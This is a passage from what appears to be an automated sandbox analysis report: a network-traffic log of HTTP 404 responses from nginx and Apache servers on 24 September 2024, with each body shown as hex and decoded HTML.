2d 73 65 72 69 66 3b 7d 20 0a 63 6f 64 65 7b 6d 61 72 67 69 6e 3a 30 3b 63 6f 6c 6f 72 3a 23 30 30 36 36 30 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 31 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 2e 63 6f 6e 66 69 67 5f 73 6f 75 72 63 65 20 63 6f 64 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 2e 38 65 6d 3b 63 6f 6c 6f 72 3a 23 30 30 30 30 30 30 3b 7d 20 0a 70 72 65 7b 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 34 65 6d 3b 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 7d 20 0a 75 6c 2c 6f 6c 7b 6d 61 72 67 69 6e 3a 31 30 70 78 20 30 20 31 30 70 78 20 35 70 78 3b 7d 20 0a 75 6c 2e 66 69 72 73 74 2c 6f 6c 2e 66 69 72 73 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 35 70 78 3b 7d 20 0a 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 3a 30 20 31 35 70 78 20 31 30 70 78 20 31 35 70 78 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 62 72 65 61 6b 2d 61 6c 6c 3b 7d 20 0a 2e 73 75 6d 6d 61 72 79 2d 63 6f 6e 74 61 69 6e 65 72 20 66 69 65 6c 64 73 65 74 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 35 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 34 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 2e 6e 6f 2d 65 78 70 61 6e 64 2d 61 6c 6c 7b 70 61 64 64 69 6e 67 3a 32 70 78 20 31 35 70 78 20 34 70 78 20 31 30 70 78 3b 6d 61 72 67 69 6e 3a 30 20 30 20 30 20 2d 31 32 70 78 3b 7d 20 0a 6c 65 67 65 6e 64 7b 63 6f 6c 6f 72 3a 23 33 33 33 33 33 33 3b 3b 6d 61 72 67 69 6e 3a 34 70 78 20 30 20 38 70 78 20 2d 31 32 70 78 3b 5f 6d 61 72 67 69 6e 2d 74 6f 70 3a 30 70 78 3b 20 0a 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 7d 20 0a 61 3a 6c 69 6e 6b 2c 61 3a 76 69 73 69 74 65 64 7b 63 6f 6c 6f 72 3a 23 30 30 37 45 46 46 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 7d 20 0a 61 3a 68 6f 76 65 72 7b 74 65 78 74 2d 6
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:29:21 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:29:23 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:29:26 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:29:29 GMTContent-Type: text/htmlContent-Length: 548Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:29:35 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3fcf-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:29:38 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3fcf-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:29:41 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3fcf-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:29:44 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66aa3fcf-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:29:58 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66a7ebf9-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:30:01 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66a7ebf9-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:30:04 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66a7ebf9-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 24 Sep 2024 09:30:07 GMTContent-Type: text/htmlContent-Length: 138Connection: closeETag: "66a7ebf9-8a"Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Sep 2024 09:30:12 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13928X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 46 61 76 69 63 6f 6e 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 69 6d 67 2f 66 61 76 69 63 6f 6e 2e 69 63 6f 22 20 72 65 6c 3d 22 69 63 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 57 65 62 20 46 6f 6e 74 73 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 70 72 65 63 6f 6e 6e 65 63 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 73 74 61 74 69 63 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 48 65 65 62 6f 3a 77 67 68 74 40 34 30 30 3b 35 30 30 3b 36 30 30 26 66 61 6d 69 6c 79 3d 49 6e 74 65 72 3a 77 67 68 74 40 37 30 30 3b 38 30 30 26 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 21 2d 2d 20 49 63 6f 6e 20 46 6f 6e 74 20 53 74 79 6c 65 73 68 65 65 74 20 2d 2d 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2f 35 2e 31 30 2e 30 2f 63 73 73 2f 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 2e 6a 73 64 65 6c 69 76 72 2e 6e 65 74 2f 6e 70 6d 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 40 31 2e 34 2e 31 2f 66 6f 6e 74 2f 62 6f 6f 74 73 74 72 61 70 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 24 Sep 2024 09:30:15 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 13928X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4d 61 6b 61 61 6e 20 2d 20 52 65 61 6c 20 45 73 74 61 74 65 20 48 54 4d 4c 20 54 65 6d 70 6c 61 74 65 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 6b 65 79 77 6f 72 64 73 22 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 22 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3e 0d 0a 0d 0a 20 20 20 